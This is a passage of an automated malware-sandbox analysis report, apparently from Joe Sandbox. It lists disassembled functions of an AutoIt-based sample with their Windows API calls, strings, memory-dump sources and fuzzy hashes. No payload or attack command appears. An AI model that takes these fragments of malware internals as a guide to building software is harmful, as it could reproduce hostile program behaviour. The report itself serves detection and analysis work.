                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: MessageSend_memmove
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 1456604079-1403004172
                                                        • Opcode ID: e357106dc71bfa5bcb1c4cc57a9d1cab727fe3d9f49319c19fac48d85d4fc7dc
                                                        • Instruction ID: 49581d0830060632d85ec08e12a1394d7e090cf5e0d3fb8a92ffb48ca198b30c
                                                        • Opcode Fuzzy Hash: e357106dc71bfa5bcb1c4cc57a9d1cab727fe3d9f49319c19fac48d85d4fc7dc
                                                        • Instruction Fuzzy Hash: 3B01A271642108ABCB06EBA8C956EFF73A89F01701F244019B503F31C2DB5C9E5996B1
                                                        Function 0075804C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: ClassName_wcscmp
                                                        • String ID: #32770
                                                        • API String ID: 2292705959-463685578
                                                        • Opcode ID: 1b00da9bf49a8ebd0eb38d8c0534ba61d782863fd881dfc137f99157585853c3
                                                        • Instruction ID: 5e0f4abb49cadd0c2a75323495be778d255a4abd7786f4598789e25da0bff103
                                                        • Opcode Fuzzy Hash: 1b00da9bf49a8ebd0eb38d8c0534ba61d782863fd881dfc137f99157585853c3
                                                        • Instruction Fuzzy Hash: 59E0923360022967E720EAA59C0AF97FBACFB517A4F00402AA914E3082D6A89A4587D5
                                                        Function 0073DA03 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • __umatherr.LIBCMT ref: 0073DA2A
                                                          • Part of subcall function 0073DD86: __ctrlfp.LIBCMT ref: 0073DDE5
                                                        • __ctrlfp.LIBCMT ref: 0073DA47
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: __ctrlfp$__umatherr
                                                        • String ID: xnx
                                                        • API String ID: 219961500-221149
                                                        • Opcode ID: c0754d78a29210a5217a74c867a8e1d048e8350be0fe226cdd407caa9d0065db
                                                        • Instruction ID: b580f9e67cb4516ea1c8139bc3c1772acb9b5a56cf9c529724896408cafb78ee
                                                        • Opcode Fuzzy Hash: c0754d78a29210a5217a74c867a8e1d048e8350be0fe226cdd407caa9d0065db
                                                        • Instruction Fuzzy Hash: E4E06D7140860EEAEB117F90F90AAA93BA5EF04310F808095F98C14097DFBA89B49757
                                                        Function 0074B35D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0074B36B
                                                          • Part of subcall function 00732011: _doexit.LIBCMT ref: 0073201B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Message_doexit
                                                        • String ID: AutoIt$Error allocating memory.
                                                        • API String ID: 1993061046-4017498283
                                                        • Opcode ID: 65c04379620ae65e4a84fcbf55b742e7dfea2d84307c83cf56b3956686f4ec2a
                                                        • Instruction ID: 113240f46064a436dba19eb37c3ed1f8463f136109e061e6c26c5657bcaa5d53
                                                        • Opcode Fuzzy Hash: 65c04379620ae65e4a84fcbf55b742e7dfea2d84307c83cf56b3956686f4ec2a
                                                        • Instruction Fuzzy Hash: 5BD0127138431872D22926A97C1FFC966888F05F51F004016BF48655C38ADDACD182E9
                                                        Function 0078BC74 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetSystemDirectoryW.KERNEL32(?), ref: 0078BAB8
                                                        • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0078BCAB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: DirectoryFreeLibrarySystem
                                                        • String ID: WIN_XPe
                                                        • API String ID: 510247158-3257408948
                                                        • Opcode ID: 45c5fa36511d4d77d8fcf57a34938974e731aeeac5ab67ff51916ef0dbb05cc8
                                                        • Instruction ID: c2f946faceb7c3a07c1a65804b81eb05b3c13b13f99c7435c88e870abcb8e8e0
                                                        • Opcode Fuzzy Hash: 45c5fa36511d4d77d8fcf57a34938974e731aeeac5ab67ff51916ef0dbb05cc8
                                                        • Instruction Fuzzy Hash: CAE0C970C4410DEFCB19EBA8D845AECB7B8BB08300F14C496E422B2151C7795A46DF26
                                                        Function 007784C9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007784DF
                                                        • PostMessageW.USER32(00000000), ref: 007784E6
                                                          • Part of subcall function 00758355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 007583CD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: FindMessagePostSleepWindow
                                                        • String ID: Shell_TrayWnd
                                                        • API String ID: 529655941-2988720461
                                                        • Opcode ID: f99c24c4549afc90c6119f21e18c43fa938749bc1194fb46a26d98b2b2ec4ab8
                                                        • Instruction ID: 10a2d608d265cabef77f6378f205746ab9ec9a52fd361982d932984a2401d399
                                                        • Opcode Fuzzy Hash: f99c24c4549afc90c6119f21e18c43fa938749bc1194fb46a26d98b2b2ec4ab8
                                                        • Instruction Fuzzy Hash: F7D0A972380300BBE670A3709C0FFCA6A04AB18B01F00492A7309AA2C0C8E8B8008228
                                                        Function 00778495 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0077849F
                                                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 007784B2
                                                          • Part of subcall function 00758355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 007583CD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: FindMessagePostSleepWindow
                                                        • String ID: Shell_TrayWnd
                                                        • API String ID: 529655941-2988720461
                                                        • Opcode ID: ce246f41f97cbbd95a6b1bde41485afb9ab6ec8365aa29f54dcab38ef6b32026
                                                        • Instruction ID: 5168c54115fba64871bcdf35deb8752c5ab275b20035aafcaa7b0bd6094bd9b0
                                                        • Opcode Fuzzy Hash: ce246f41f97cbbd95a6b1bde41485afb9ab6ec8365aa29f54dcab38ef6b32026
                                                        • Instruction Fuzzy Hash: E5D0A972384300B7E670A3709C0FFCA6A04AB14B01F00492A7309AA2C0C8E8A8008224